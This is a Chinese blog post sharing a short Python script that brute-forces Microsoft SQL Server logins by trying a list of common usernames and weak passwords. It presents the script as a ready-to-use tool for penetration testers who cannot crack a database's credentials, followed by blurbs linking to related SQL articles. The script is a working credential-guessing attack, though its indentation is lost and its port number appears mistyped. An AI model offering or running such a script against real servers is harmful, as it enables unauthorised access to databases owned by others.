Python版Mssql爆破小脚本
更新时间:2016年10月16日 20:23:00 投稿:hebedich
本文给大家分享的是使用Python实现的暴力破解mssql用户密码的脚本的代码,配合上合适的字典非常好用,有需要的小伙伴可以参考下
Mssql Python版本爆破小脚本,需要安装 MSSQL-python.exe 可以看出代码量很少,用法:保存代码为MssqlDatabaseBlasting.py,cmd切换到 MssqlDatabaseBlasting.py路径下,并 执行 MssqlDatabaseBlasting.py即可开始破解
import pymssql
common_weak_password = ('','123456','test','root','admin','user')#密码字典
mssql_username = ('sa', 'test', 'admin', 'mssql')#账号字典
success = False
host = "127.0.0.1"#数据库IP地址
port = 1443
for username in mssql_username:
for password in common_weak_password:
try:
db = pymssql.connect(server=host, port=port, user=username, password=password)
success = True
if success:
print username, password
except Exception, e:
pass
说明:看到很多网络安全爱好者,在进行渗透测试的时候,遇到数据库可以远程管理,但是无法破解其账号密码,所以此篇文章就推送几个脚本进行渗透。
相关文章
给大家分享个效率最高的分页查询 5000万级别有效 比 ROWNUMBER 和Top效率高2009-06-06
这篇文章主要为大家详细介绍了MSSQLSERVER不同版本设置开启远程连接,包括SQL SERVER 2008/2012/2012R2/2014开启远程连接的设置方法,具有一定的参考价值,感兴趣的小伙伴们可以参考一下2017-03-03
在sql中我判断包含字符串我们可使用很多方法如like,replace,charindex函数都可实现我们要的功能,下面我来给大家介绍判断字符串包含字符串sql语句。感兴趣的朋友一起看看吧2017-09-09
如果你是初学者,如果你只是想要在家里学习学习,如果你的环境是 WindowsXP Pro,那么,你应该选择的 是 SQL2005 Development(开发版),而不是 SQL2005 Enterprise (企业版)或 SQL2005 Express(简易版)。2010-05-05
DnsLog注入可以理解成是一种技巧,而不是一种攻击方式,是一种让无回显的攻击,变得有回显的方式,包括但不限于SQL盲注,这篇文章主要介绍了SQL DNSlog注入详解,需要的朋友可以参考下2023-05-05
合并多行记录的方法,汇总。2009-06-06
废话不多说,直接上结果,相信这也是大多数搜索答案的人最愿意看的方式。2013-03-03
在程序开发中我们经常性的存储过程,可以提升执行效率等,但也也会有一些缺点大家可以根据需要选用2012-04-04
SQL对字符串的处理能力比较弱,比如我要循环遍历象1,2,3,4,5这样的字符串,如果用数组的话,遍历很简单,但是T-SQL不支持数组,所以处理下来比较麻烦。下边的函数,实现了象数组一样去处理字符串。2011-04-04
这篇文章主要介绍了SQL Server 批量插入数据的完美解决方案,需要的朋友可以参考下2020-12-12
最新评论